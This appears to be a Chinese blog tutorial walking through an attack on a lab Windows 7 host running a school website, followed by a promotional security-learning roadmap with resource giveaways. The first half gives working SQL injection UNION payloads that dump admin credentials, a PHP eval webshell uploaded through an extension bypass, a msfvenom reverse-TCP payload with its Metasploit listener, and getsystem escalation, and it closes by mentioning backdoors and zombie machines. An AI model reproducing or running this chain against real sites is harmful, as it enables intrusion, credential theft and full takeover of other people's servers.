网站攻击到提权的全部过程

准备工作

靶机（被攻击方）：win7系统
入侵者（攻击方）：win10系统、kali系统

首先启动win7系统，搭建一个常见的校园网站，然后映射到局域网，使得我们能正常访问。

从网站拿到webshell

2023最新整理网络安全/渗透测试/安全学习/100份src技术文档（全套视频、大厂面经、精品手册、必备工具包、路线）一>获取<一

sql注入漏洞

把整个网站浏览完一遍后，我们发现这里的url为?id=10结尾，我们猜测可能是一个sql注入点。

首先我们在id=10后面加上一个单引号’进行判断。

这个时候我们发现回显的数据不正常，于是我们再加一个注释符号。

发现数据这个时候回显的时候是正常的，到这一步我们已经可以确定这里存在一个sql注入漏洞。

原理我们可以简单解释一下
在网站中，我们一般使用数据库存储网站数据，网站和数据库是存在一个交互性。网站所呈现的内容是由代码中写入的sql语句调用数据库中的内容进行一个呈现，例如我们刚刚看到的文字。
而sql注入漏洞一般是由于程序员书写的sql语句不规范所导致的安全事件。

例如网站源码中使用如下的sql语句进行查询。

给语句结尾的where查询条件加上一个单引号’。

很显然，我们传入的单引号和前面的单引号闭合，后面只有一个无法成对的单引号，然后报了语法错误。这个时候我们再加上--+注释符号注释掉后面的单引号。

这个时候查询的数据就会正确回显出来。

原理简单解释了一下之后，我们回到刚刚的网站。
这个时候我们发现存在sql注入漏洞之后，我们就开始进行查询对方网站数据库的数据，找到一些敏感信息，例如管理员的账号密码等等。

首先，我们使用order by语句快速猜解出表中的列数。

发现10列的时候报错，说明不足10列，我们继续缩小范围。

再查询第8列的时候，发现数据回显正确，说明对方表中含有列数8
我们使用union select 自定义查询测试一下，zhu意我们这里前面的id=10，要写成id=-10，把这里的查询置空。

发现会分别回显第三列、第五列和第七列。接下来我们就可以在三、五、七处做做文章。

查询数据库名字：

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,database(),4,5,6,7,8--+

得到数据库名字：qzn_zuiai

查询数据库中的表名：

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema="qzn_zuiai"--+

得到一共se2admin,se2fl,se2hd,se2nr,se2tufl,se2tunr,se2wz,se2zf,sj3sk九张表
通过表名，我们猜测se2admin可能是存储管理员账号和密码的表，所以我们先查询这张表中的数据

查询表se2admin中的字段：

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name="se2admin"--+

得到表中的字段值有id，name，pass等，接下来我们查询name和pass的字段值。

查询字段值：

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,name,4,pass,6,7,8 from se2admin--+

我们得到管理员账号：admin，管理员账号密码：7fef6171469e80d32c0559f88b377245
很显然密码值是被加密的md5值，所以我们去网上找md5网站进行撞库查询。

得到管理员密码为：admin888
接下来我们需要查找这个网站的后台地址，我们使用御剑进行一个扫描。

御剑爆出了很多敏感地址，我们找到一个admin的目录，可能是后台地址，我们去访问一下。

输入我们刚刚得到的管理员账号和密码admin:admin888。

这个时候，我们成功进入对方网站后台。

文件上传漏洞

接下来我们再这里找到一个文件上传点。

我们写一个简单的一句话木马。

<?php @eval($_POST['pass']);?>

考虑到这里可能会对我们上传的文件进行一个后缀限制，例如只能上传jpg或者png图片格式文件等，所以我们把muma.txt改成muma.jpg格式。

我们开启burpsuite，然后点提交，拦截到我们发送的数据包。

我们把muma.jpg改回php文件类型：muma.php。

然后发送数据包。

ok，已经上传成功，我们去找找我们上传后的路径。

得到我们的上传完整路径为：http://192.168.1.167/yxlink/img/img_3699336993.php
我们使用蚁剑进行连接我们上传的木马。

成功连接，进入到对方服务器。

到此，已成功拿到webshell。

反弹shell连接

接下来我们利用kali的msf制作一个exe类型的反弹型木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f 类型 -o 文件名

把做好的木马，通过我们蚁剑刚刚连接的webshell进行上传。

上传成功后，我们在kali启动msf。

执行监听

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.131 set lport 4444 exploit

执行木马

msf开启监听之后，我们去蚁剑webshell执行我们上传的木马。

执行之后，回到kali，我们可以看到msf目标正在回连，创建Meterpreter会话成功。

提权

首先查看一下我们的用户权限。

发现是普通用户权限，之前我们已经在webshell观察到对方是win7系统，所以我们采用的是windows的载荷攻击
我们尝试使用getsystem进行提权试试。

发现直接提权成功，现在我们拥有windows最高权限system。
接下来我们打印一下系统信息，并且拍照对方电脑现在状态。

ok，成功。

结语

在拿到system权限之后，我们可以干很多很多的事…例如给对方种下后门，拿来当肉鸡等等。。。
这告诉我们开发网站必须注重安全，否则带来的后果是无穷大的。
emmm…这波有点难受。

网络安全学习路线&学习资源

【----帮助网安学习，以下所有学习资料免费领！】

① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集（含答案）
⑧ APP客户端安全检测指南（安卓+IOS）

网络安全的知识多而杂，怎么科学合理安排？

下面给大家总结了一套适用于网安零基础的学习路线，应届生和转行人员都适用，学完保底6k！就算你底子差，如果能趁着网安良好的发展势头不断学习，日后跳槽大厂、拿到百万年薪也不是不可能！

【点击这里，先领资料再阅读哦~】

初级网工

1、网络安全理论知识（2天）

①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（一周）

①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（一周）

①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（一周）

①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）

①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）

①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；如果等保模块学的好，还可以从事等保工程师。薪资区间6k-15k

到此为止，大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗？

【“脚本小子”成长进阶资源领取】

7、脚本编程（初级/中级/高级）

在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力.

零基础入门，建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习； 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP， IDE强烈推荐Sublime； ·Python编程学习，学习内容包含：语法、正则、文件、 网络、多线程等常用库，推荐《Python核心编程》，不要看完； ·用Python编写漏洞的exp,然后写一个简单的网络爬虫； ·PHP基本语法学习并书写一个简单的博客系统； 熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)； ·了解Bootstrap的布局或者CSS。

8、超级网工

这部分内容对零基础的同学来说还比较遥远，就不展开细说了，贴一个大概的路线。感兴趣的童鞋可以研究一下，不懂得地方可以【点这里】加我耗油，跟我学习交流一下。

网络安全学习路线&学习资源

扫描下方卡片可获取最新的网络安全资料合集（包括200本电子书、标准题库、CTF赛前资料、常用工具、知识脑图等）助力大家提升进阶！

结语

网络安全产业就像一个江湖，各色人等聚集。相对于欧美国家基础扎实（懂加密、会防护、能挖洞、擅工程）的众多名门正派，我国的人才更多的属于旁门左道（很多白帽子可能会不服气），因此在未来的人才培养和建设上，需要调整结构，鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”，才能解人才之渴，真正的为社会全面互联网化提供安全保障。

特别声明：

此教程为纯技术分享！本书的目的决不是为那些怀有不良动机的人提供及技术支持！也不承担因为技术被滥用所产生的连带责任！本书的目的在于最大限度地唤醒大家对网络安全的重视，并采取相应的安全措施，从而减少由网络安全而带来的经济损失！！！